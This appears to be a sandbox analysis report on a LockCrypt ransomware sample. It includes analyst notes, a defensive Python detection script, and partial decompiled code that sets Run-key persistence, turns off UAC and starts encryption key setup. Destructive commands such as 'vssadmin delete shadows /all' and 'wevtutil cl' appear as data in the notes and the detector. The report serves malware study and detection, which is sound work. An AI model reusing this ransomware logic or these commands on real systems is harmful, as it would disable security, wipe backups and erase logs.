Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | API coverage: 5.0 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe TID: 4312 | Thread sleep count: 4593 > 30
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe TID: 4312 | Thread sleep time: -137790000s >= -30000s
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe TID: 4312 | Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Last function: Thread delayed
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_2_004014CC FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,lstrcatW,lstrlenW,lstrcatW,lstrcatW,GlobalMemoryStatus,Sleep,CreateThread,CloseHandle,lstrcmpiW,lstrlenW,lstrcmpiW,lstrcatW,lstrlenW,lstrcatW,lstrcatW,lstrcatW,SetFileAttributesW,FindNextFileW,FindClose,GlobalFree,0_2_004014CC
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_1_004014CC FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,lstrcatW,lstrlenW,lstrcatW,lstrcatW,GlobalMemoryStatus,Sleep,CreateThread,CloseHandle,lstrcmpiW,lstrlenW,lstrcmpiW,lstrcatW,lstrlenW,lstrcatW,lstrcatW,lstrcatW,SetFileAttributesW,FindNextFileW,FindClose,GlobalFree,0_1_004014CC
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Code function: 9_2_00E9A394 memset,FindFirstFileW,memset,PathRemoveFileSpecW,WerRegisterFile,FindNextFileW,FindClose,9_2_00E9A394
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Code function: 9_2_00E95DAE FindFirstFileW,9_2_00E95DAE
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Code function: 9_1_00E9A394 memset,FindFirstFileW,memset,PathRemoveFileSpecW,WerRegisterFile,FindNextFileW,FindClose,9_1_00E9A394
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Code function: 9_1_00E95DAE FindFirstFileW,9_1_00E95DAE
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: module.8144.18ffc90c0.400000.exe, 00000000.00000002.2316354878.0000000002600000.00000002.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: module.8144.18ffc90c0.400000.exe, 00000000.00000002.2316354878.0000000002600000.00000002.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: module.8144.18ffc90c0.400000.exe, 00000000.00000002.2316354878.0000000002600000.00000002.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: module.8144.18ffc90c0.400000.exe, 00000000.00000002.2316354878.0000000002600000.00000002.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe  Code function: 9_2_00E9A7CF IsDebuggerPresent,OutputDebugStringW, 9_2_00E9A7CF
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe  Code function: 0_2_00401D2D CreateToolhelp32Snapshot,Process32FirstW,lstrcmpiW,lstrlenW,GetCurrentProcessId,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,Sleep, 0_2_00401D2D
Note: the IsDebuggerPresent hit is in FileCoAuth.exe, the OneDrive COM server started with -Embedding, not in the sample. The sample's own routine 0_2_00401D2D walks the process list with Toolhelp, compares image names with lstrcmpiW, skips its own PID (GetCurrentProcessId) and calls TerminateProcess on every other match, then sleeps and starts a new snapshot (see the execution graph, 401dd2 -> 401d42). That is a process-killing loop rather than a parent-PID check.
Contains functionality to register its own exception handler
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe  Code function: 9_2_00EA32C6 ?terminate@@YAXXZ,__crtSetUnhandledExceptionFilter, 9_2_00EA32C6
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe  Code function: 9_1_00EA32C6 ?terminate@@YAXXZ,__crtSetUnhandledExceptionFilter, 9_1_00EA32C6

HIPS / PFW / Operating System Protection Evasion:

barindex
May try to detect the Windows Explorer process (often used for injection)
Source: module.8144.18ffc90c0.400000.exe, 00000000.00000002.2315187273.0000000000EB0000.00000002.sdmp, FileCoAuth.exe, 00000009.00000002.2317512776.0000000001CA0000.00000002.sdmp  Binary or memory string: Program Manager
Source: module.8144.18ffc90c0.400000.exe, 00000000.00000002.2315187273.0000000000EB0000.00000002.sdmp, FileCoAuth.exe, 00000009.00000002.2317512776.0000000001CA0000.00000002.sdmp  Binary or memory string: Shell_TrayWnd
Source: module.8144.18ffc90c0.400000.exe, 00000000.00000002.2315187273.0000000000EB0000.00000002.sdmp, FileCoAuth.exe, 00000009.00000002.2317512776.0000000001CA0000.00000002.sdmp  Binary or memory string: Progman
Source: module.8144.18ffc90c0.400000.exe, 00000000.00000002.2315187273.0000000000EB0000.00000002.sdmp, FileCoAuth.exe, 00000009.00000002.2317512776.0000000001CA0000.00000002.sdmp  Binary or memory string: Progmanlock
Note: the same window-class names appear in both processes, each in a mapped region (0xEB0000 in the sample, 0x1CA0000 in FileCoAuth.exe) rather than in the sample's 0x400000 image, which is what a shared system DLL looks like in memory. The sample imports nothing from user32.dll and no window-enumeration API, so there is no evidence it ever looks these windows up.

Language, Device and Operating System Detection:

barindex
Contains functionality to query locale information (e.g. system language)
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe  Code function: GetLocaleInfoW, 9_2_00E97325
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe  Code function: GetLocaleInfoW, 9_1_00E97325
Contains functionality to query local / system time
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe  Code function: 0_2_004017A2 GetModuleFileNameA,lstrcmpiA,RegOpenKeyExA,lstrlenA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,CopyFileA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,CryptAcquireContextA,GetLastError,GetEnvironmentVariableA,ShellExecuteA,Sleep,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptEncrypt,CryptDestroyKey,KiUserExceptionDispatcher,CryptReleaseContext,RegSetValueExA,RegSetValueExA,RegCloseKey,RtlZeroMemory,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,CryptAcquireContextA,CryptImportKey,GetSystemTimeAsFileTime,FileTimeToSystemTime,GetDateFormatA,lstrlenA,MultiByteToWideChar,lstrcatA,RegCreateKeyA,lstrcatA,lstrcatA,lstrlenA,RegSetValueExA,RegCloseKey,SHChangeNotify,GetEnvironmentVariableA,ShellExecuteA,GlobalFree,SetErrorMode,Sleep,Sleep,ShellExecuteA,CreateFileA,WriteFile,CloseHandle,ShellExecuteA, 0_2_004017A2
Note: in the decompiled listing of E004017A2 below, the time query is not an evasion check. The function takes GetSystemTimeAsFileTime, adds 0x258 to the high FILETIME dword (about three days) and formats the result with GetDateFormatA as "dd,MM,yyyy" into the static data area that holds the ransom-note HTA, i.e. it computes the payment deadline shown to the victim.
Contains functionality to query the account / user name
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe  Code function: 9_2_00E969DE memset,GetUserNameW, 9_2_00E969DE
Contains functionality to query windows version
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe  Code function: 9_2_00EA1383 GetVersionExW, 9_2_00EA1383
Queries the cryptographic machine GUID
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Contains functionality to modify Windows User Account Control (UAC) settings
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe  Code function: RegSetValue: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ (PromptOnSecureDesktop, EnableLUA, ConsentPromptBehaviorAdmin) 0_1_004017A2
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe  Code function: RegSetValue: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ (PromptOnSecureDesktop, EnableLUA, ConsentPromptBehaviorAdmin) 0_1_0040191C
Note: the decompiled E004017A2 listing below writes each of the three values as a 4-byte REG_DWORD from a buffer that was just zeroed (RtlZeroMemory appears immediately before the RegOpenKeyExA in the API chain), so all three are set to 0. EnableLUA=0 disables UAC entirely after the next logon; ConsentPromptBehaviorAdmin=0 and PromptOnSecureDesktop=0 remove the elevation prompt and the secure desktop for administrators in the meantime. The sample already ran with administrator privileges in this analysis (see System Behavior), so these writes succeed.
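The three Policies\System writes above, together with the other system-weakening steps visible in the decompiled E004017A2 listing later in this report (vssadmin delete shadows /all via ComSpec, a batch file that runs wevtutil cl over every event log, Run-key persistence for C:\windows\searchfiles.exe and the "Decoding help.hta" note, and an HKCR\.<ext>\shell\open\command handler repointed at mshta.exe), all surface in ordinary process-creation and registry-set telemetry. The Python below is an added detection example written for this report; it is not code from the sample or from Joe Sandbox. The events are constructed dictionaries with simplified Sysmon-like fields (EventID 1: type/image/cmdline; EventID 13: type/key/value/data); those field names are an assumption about your log schema, and the ".xyz" extension in the HKCR event is a placeholder because the report does not show which extension the sample registers.

```python
"""Detection logic for the system-weakening steps performed by E004017A2.

Added example for this report, not code from the sample or from Joe Sandbox.
Events are constructed dictionaries with simplified Sysmon-like fields
(EventID 1 process creation: type/image/cmdline; EventID 13 registry value set:
type/key/value/data).  The field names are an assumption about the log schema;
real Sysmon renders DWORD data as "DWORD (0x00000000)", here it is an int.
"""
import re
from typing import Callable, Dict, Iterable, List, Tuple

Event = Dict[str, object]

UAC_POLICY_KEY = r"software\microsoft\windows\currentversion\policies\system"
UAC_VALUES = {"EnableLUA", "ConsentPromptBehaviorAdmin", "PromptOnSecureDesktop"}
RUN_KEY = r"software\microsoft\windows\currentversion\run"

SHADOW_DELETE = re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)
LOG_CLEAR = re.compile(r"wevtutil(\.exe)?\s+cl\b", re.I)
# Run-key data the sample writes: an .hta ransom note, and an .exe dropped directly in %SystemRoot%
RUN_SUSPECT = re.compile(r'\.hta\b|mshta|^"?[a-z]:\\windows\\[^\\]+\.exe', re.I)
# HKCR\.<ext>\shell\open\command: the file-association handler the sample repoints at mshta.exe
HKCR_OPEN_CMD = re.compile(r"^hkcr\\\.[^\\]+\\shell\\open\\command$", re.I)


def _is_proc(e: Event) -> bool:
    return e.get("type") == "process"


def _is_reg(e: Event) -> bool:
    return e.get("type") == "registry"


def _key_is(e: Event, suffix: str) -> bool:
    # Tolerate hive prefixes and the trailing backslash the sample's own strings carry.
    return str(e.get("key", "")).lower().rstrip("\\").endswith(suffix)


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("shadow_copy_deletion",
     lambda e: _is_proc(e) and bool(SHADOW_DELETE.search(str(e["cmdline"])))),
    ("event_log_clearing",
     lambda e: _is_proc(e) and bool(LOG_CLEAR.search(str(e["cmdline"])))),
    ("uac_disabled_via_policy",
     lambda e: _is_reg(e) and _key_is(e, UAC_POLICY_KEY)
     and e["value"] in UAC_VALUES and e["data"] == 0),
    ("run_key_suspicious_target",
     lambda e: _is_reg(e) and _key_is(e, RUN_KEY)
     and bool(RUN_SUSPECT.search(str(e["data"])))),
    ("file_association_hijacked_to_mshta",
     lambda e: _is_reg(e) and bool(HKCR_OPEN_CMD.match(str(e["key"])))
     and "mshta" in str(e["data"]).lower()),
]


def evaluate(events: Iterable[Event]) -> List[Tuple[int, str]]:
    """Return (event_index, rule_name) for every event that satisfies a rule."""
    hits: List[Tuple[int, str]] = []
    for idx, ev in enumerate(events):
        for name, predicate in RULES:
            if predicate(ev):
                hits.append((idx, name))
    return hits


# Constructed events mirroring what E004017A2 does, followed by two benign controls.
SAMPLE_EVENTS: List[Event] = [
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c vssadmin delete shadows /all"},
    {"type": "registry", "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",
     "value": "EnableLUA", "data": 0},
    {"type": "registry", "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "unlock", "data": r'"c:\Decoding help.hta"'},
    {"type": "registry", "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "searchfiles", "data": r"C:\windows\searchfiles.exe"},
    {"type": "registry", "key": r"HKCR\.xyz\shell\open\command",   # ".xyz" is a placeholder extension
     "value": "", "data": r'C:\Windows\System32\mshta.exe "c:\Decoding help.hta"'},
    {"type": "process", "image": r"C:\Windows\System32\wevtutil.exe",
     "cmdline": 'wevtutil.exe cl "Microsoft-Windows-Sysmon/Operational"'},
    # benign controls: an administrator listing shadow copies, and a normal Run entry
    {"type": "process", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin list shadows"},
    {"type": "registry", "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "OneDrive",
     "data": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
]

if __name__ == "__main__":
    for idx, rule in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The rules are deliberately narrow: "vssadmin list shadows" and a normal OneDrive Run entry produce no hit, while every step this sample takes produces exactly one. The UAC rule keys on the value name and the zero data rather than on the process, because the sample writes them from its own process but a copy launched as C:\windows\searchfiles.exe would do the same under a different image name.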

Remote Access Functionality:

barindex
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe  Code function: 9_2_00E9ECC0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z,__EH_prolog3,CreateBindCtx, 9_2_00E9ECC0
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe  Code function: 9_1_00E9ECC0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z,__EH_prolog3,CreateBindCtx, 9_1_00E9ECC0
Note: this is a false positive for the sample. CreateBindCtx is a COM moniker API, the hit is in the legitimate OneDrive FileCoAuth.exe (activated through COM with -Embedding), and the sample itself imports no socket or HTTP library at all (see Imports under Static PE Info: kernel32, shell32, advapi32 and mpr only). Its only network-facing imports are the mpr.dll WNet* functions, which routine 0x401131 uses to enumerate reachable shares for encryption, consistent with "No network behavior found" below.

Behavior Graph

Behavior Graph ID: 136638  Sample: module.8144.18ffc90c0.400000.dll  Start date: 29/05/2019  Architecture: WINDOWS  Score: 80

Graph nodes (the interactive rendering and its legend are not reproduced):

  • Sample-level signatures: Antivirus or Machine Learning detection for sample; Deletes shadow drive data (may be related to ransomware); Antivirus or Machine Learning detection for unpacked file
  • Process started: module.8144.18ffc90c0.400000.exe
  • Process started: FileCoAuth.exe
  • Signatures on module.8144.18ffc90c0.400000.exe: Detected LockCrypt Ransomware; Contains functionality to encrypt and move a file in one function; Contains functionality to modify Windows User Account Control (UAC) settings; 2 other signatures

Simulations

Behavior and APIs

Time      Type             Description
16:50:40  API Interceptor  4607x Sleep call for process: module.8144.18ffc90c0.400000.exe modified

Antivirus and Machine Learning Detection

Initial Sample

Source                            Detection  Scanner         Label  Link
module.8144.18ffc90c0.400000.exe  100%       Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source                                               Detection  Scanner         Label  Link  Download
0.0.module.8144.18ffc90c0.400000.exe.400000.0.unpack  100%       Joe Sandbox ML                Download File
0.1.module.8144.18ffc90c0.400000.exe.400000.0.unpack  100%       Joe Sandbox ML                Download File
0.2.module.8144.18ffc90c0.400000.exe.400000.0.unpack  100%       Joe Sandbox ML                Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches


Startup

  • System is w10x64
  • FileCoAuth.exe (PID: 2916 cmdline: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe -Embedding MD5: 7BBCC04B54BA6CF2B28304F6F75D9512)
  • cleanup

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2019-5-29.2357.2916.1.aodl
Process:C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe
File Type:data
Size (bytes):96
Entropy (8bit):3.4085043860359887
Encrypted:false
MD5:C37C99E2664E88627C732AE5CC371962
SHA1:CAE521AE688E99908DAE2873C4BFC403A3C63C16
SHA-256:473EA8B6E02226DD098163F890BCE408E3736BD0AEE5DA27F9797DC21CD0EFCF
SHA-512:BD480EBBE4231FC3D7FFFDC3E051D48E4A0E5CF2E5A88640CA6F0C89BDDF8A3569EB9C50911BEA69EBF172A91EC5FE0208A62B934522A27B373E9A115B75F8E2
Malicious:false
Reputation:low
Preview:EBFGONED....................17.3.6816.0313;ship.onedrive.client-iB..............................

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

Static File Info

General

File type:PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Entropy (8bit):5.807309466271178
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.82%
  • Java Script embedded in Visual Basic Script (8000/0) 0.08%
  • Java Script (6500/0) 0.06%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
File name:module.8144.18ffc90c0.400000.exe
File size:11776
MD5:2d1ca86789091f84f0d4f6af9fd5d51d
SHA1:060f86ddb170c4cc721b265a11dbae12533811f4
SHA256:b8dcb1757bfc5d1f57a0927e269a06b5d284340921cc47dd4d7753bb98e04f9f
SHA512:7f55f9205cb472ea07b6bba4971db51acdccb5cf472602a0738bef44b3b21b433dd7c14cc176ea20bd0d4710e810c989f9a1eaf8a616c0875afcde4c40f3b339
SSDEEP:192:GrfOVf1TFoTxFEx29bV29LTwmH+8Ihuz6uTCxWN1tvjywPqcwXYjwdqOKd+7o:GrfOnTFo0x2dm8s++CxW/5SIjwoO1o
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]...................S...........Rich............PE..L......\..................... ............... ....@........................

File Icon

Icon Hash:00828e8e8686b000

Static PE Info

General

Entrypoint:0x401000
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:0x5C91ECFE [Wed Mar 20 07:34:22 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:0a98a06f576cfeebd2f91325d9ccac02

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF4h
mov dword ptr [ebp-04h], 000010F0h
push F0000000h
push 00000018h
push 00000000h
push 00000000h
lea eax, dword ptr [ebp-08h]
push eax
call 5CF932BCh
lea eax, dword ptr [ebp-0Ch]
push eax
mov dword ptr [eax+10h], 004017A2h
xor edi, edi
push edi
push edi
push 0000002Ch
call 5CF923A1h
or byte ptr [edx], al
add byte ptr [eax], al
adc byte ptr [esi+00h], ah
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [esi+2Fh], dl
jle 5CF923D1h
and eax, 950B6CCCh
push 35682128h
push esp
push esp
xor al, ECh
enter AAF5h, 2Bh
xor ch, 00000069h
xchg eax, ecx
out dx, al
sub eax, E1813362h
push dword ptr [ebp-08h]
call 5CF93296h
lea eax, dword ptr [ebp-04h]
push eax
push 00403000h
push 00000000h
push 00000000h
push 00000000h
push dword ptr [ebp-0Ch]
call 5CF93261h
push dword ptr [ebp-0Ch]
call 5CF9325Fh
push 00000000h
push dword ptr [ebp-08h]
call 5CF93273h
leave
ret
push ebp
mov ebp, esp
add esp, FFFFFFF4h
push 00008000h
call 5CF92A50h
mov dword ptr [ebp-08h], eax
push dword ptr [ebp+08h]
push dword ptr [ebp-08h]
call 5CF93205h
push dword ptr [ebp-08h]
call 5CF93209h
mov ebx, dword ptr [ebp-08h]
mov byte ptr [ebx+eax*2-06h], 00000000h
push 0040379Eh

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x2120           0x64          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x114         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0xfd4         0x1000    False     0.5673828125     data       5.53282933147  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x2000           0x72c         0x800     False     0.5458984375     data       5.17939846828  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x3000           0x1730        0x1200    False     0.577039930556   data       5.80284978838  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Note: no relocations, no resources, no TLS and no debug directory, and .data has a virtual size (0x1730) larger than its raw size (0x1200). The attacker's embedded public key that E004017A2 imports from 0x403fbf lies inside the raw .data (offset 0xfbf), while the 0x114-byte victim public-key buffer at 0x4045e0 (offset 0x15e0) falls in the zero-filled tail, which is why the registry values "orsa" and "rsa" are only populated at run time.

Imports

DLL           Import
kernel32.dll  GetModuleFileNameA, GetSystemTimeAsFileTime, GlobalAlloc, GlobalFree, GlobalMemoryStatus, MapViewOfFile, MoveFileW, MultiByteToWideChar, OpenProcess, Process32FirstW, Process32NextW, RtlZeroMemory, SetErrorMode, GetLogicalDrives, SetFilePointerEx, Sleep, TerminateProcess, UnmapViewOfFile, WriteFile, lstrcatA, lstrcatW, lstrcmpW, lstrcmpiA, lstrcmpiW, lstrcpyW, lstrlenA, lstrlenW, GetLastError, GetFileAttributesW, GetEnvironmentVariableA, GetDateFormatA, GetCurrentProcessId, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, CreateToolhelp32Snapshot, CreateThread, CreateFileW, CreateFileMappingA, CreateFileA, CopyFileA, SetFileAttributesW, CloseHandle
shell32.dll   SHChangeNotify, ShellExecuteA
advapi32.dll  RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, CryptReleaseContext, CryptImportKey, CryptGenKey, CryptExportKey, CryptEncrypt, CryptDestroyKey, CryptDecrypt, CryptAcquireContextA, AdjustTokenPrivileges, RegQueryValueExA, RegSetValueExA, RegCreateKeyA
mpr.dll       WNetOpenEnumA, WNetEnumResourceA, WNetCloseEnum


Network Behavior

No network behavior found


System Behavior

General

Start time:16:50:39
Start date:29/05/2019
Path:C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe'
Imagebase:0x400000
File size:11776 bytes
MD5 hash:2D1CA86789091F84F0D4F6AF9FD5D51D
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Start time:16:57:56
Start date:29/05/2019
Path:C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe -Embedding
Imagebase:0xe90000
File size:214656 bytes
MD5 hash:7BBCC04B54BA6CF2B28304F6F75D9512
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:low

Disassembly

Code Analysis


    Execution Graph

    Execution Coverage:37.8%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:77.6%
    Total number of Nodes:134
    Total number of Limit Nodes:5

    Graph: execution graph from the entry point at 0x401000 through the CryptoAPI key setup, the registry and ransom-note writes in 0x4017a2, the share enumeration in 0x401131, the per-file encryption path 0x4014cc -> 0x40128d and the process-killing loop at 0x401d2d (interactive rendering not reproduced; the call edges are listed under Callgraph below).

    Callgraph (caller -> callee, recovered from the interactive graph)

    Function_00401000 -> Function_00401063
    Function_004017A2 -> Function_00401781, Function_00401DE7, Function_004016FF
    Function_004014CC -> Function_00401781, Function_0040128D, Function_00401096
    Function_00401D2D -> Function_00401DE7
    Function_00401131 -> Function_00401781, Function_00401131 (recursive share enumeration)
    Function_00401096 -> Function_00401781
    Function_0040191C -> Function_00401DE7, Function_004016FF
    Function_004016FF -> Function_00401781, Function_004014CC, Function_00401131
    Function_00401D2B: no edges recorded

    Executed Functions

    C-Code - Quality: 65%
    			E004017A2() {
    				struct _SYSTEMTIME _v20;
    				struct _FILETIME _v28;
    				long* _v32;
    				void* _v36;
    				char* _v40;
    				long* _v44;
    				int _v48;
    				int _v52;
    				long _v56;
    				void* _v60;
    				CHAR* _t88;
    				int _t90;
    				int _t98;
    				long _t158;
    				void* _t186;
    				long _t191;
    				void* _t192;
    				char* _t195;
    				CHAR* _t196;
    				void* _t197;
    				void* _t201;
    
    				_v60 = 0;
    				_t88 = E00401781(0x8000); // executed
    				_v40 = _t88;
    				GetModuleFileNameA(0, _t88, 0x8000); // executed
    				_t90 = lstrcmpiA("C:\\windows\\searchfiles.exe", _v40); // executed
    				if(_t90 != 0) {
    					RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0xf013f,  &_v36); // executed
    					RegSetValueExA(_v36, "unlock", 0, 1, "\"c:\\Decoding help.hta\"", lstrlenA("\"c:\\Decoding help.hta\""));
    					RegSetValueExA(_v36, "searchfiles", 0, 1, "C:\\windows\\searchfiles.exe", lstrlenA("C:\\windows\\searchfiles.exe"));
    					RegCloseKey(_v36);
    					CopyFileA(_v40, "C:\\windows\\searchfiles.exe", 0); // executed
    				}
    				RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\DateTime\\", 0, 0xf013f,  &_v36); // executed
    				_v52 = 0x114;
    				if(RegQueryValueExA(_v36, "orsa", 0, 0, 0x4045e0,  &_v52) != 0 || _v52 != 0x114) {
    					goto L7;
    				} else {
    					_v52 = 0x500;
    					if(RegQueryValueExA(_v36, ?str?, 0, 0, 0x4040e0,  &_v52) != 0 || _v52 != 0x500) {
    						while(1) {
    							L7:
    							_t98 = CryptAcquireContextA( &_v44, 0, 0, 1, 0xf0000000); // executed
    							while(_t98 == 0) {
    								_t158 = GetLastError();
    								if(_t158 != 0x80090019) {
    									if(_t158 != 0x8009000f) {
    										break;
    									}
    									_t98 = CryptAcquireContextA( &_v44, 0, 0, 1, 8);
    									continue;
    								}
    								GetEnvironmentVariableA("ComSpec", _v40, 0x5dc);
    								ShellExecuteA(0, 0, _v40, "/c Regsvr32 /s Rsaenh.dll", 0, 0);
    								Sleep(0x64);
    								goto L7;
    							}
    							_push( &_v32);
    							_push(0x8000001);
    							_push(1);
    							_push(_v44);
    							L00401F86(); // executed
    							_v48 = 0x494;
    							_push( &_v48);
    							_push(_v40);
    							_push(0);
    							_push(7);
    							_push(0);
    							_push(_v32);
    							L00401F80(); // executed
    							_v48 = 0x114;
    							_push( &_v48);
    							_push(0x4045e0);
    							_push(0);
    							_push(6);
    							_push(0);
    							_push(_v32);
    							L00401F80();
    							CryptDestroyKey(_v32);
    							CryptReleaseContext(_v44, 0);
    							CryptAcquireContextA( &_v44, 0, 0, 1, 0xf0000000); // executed
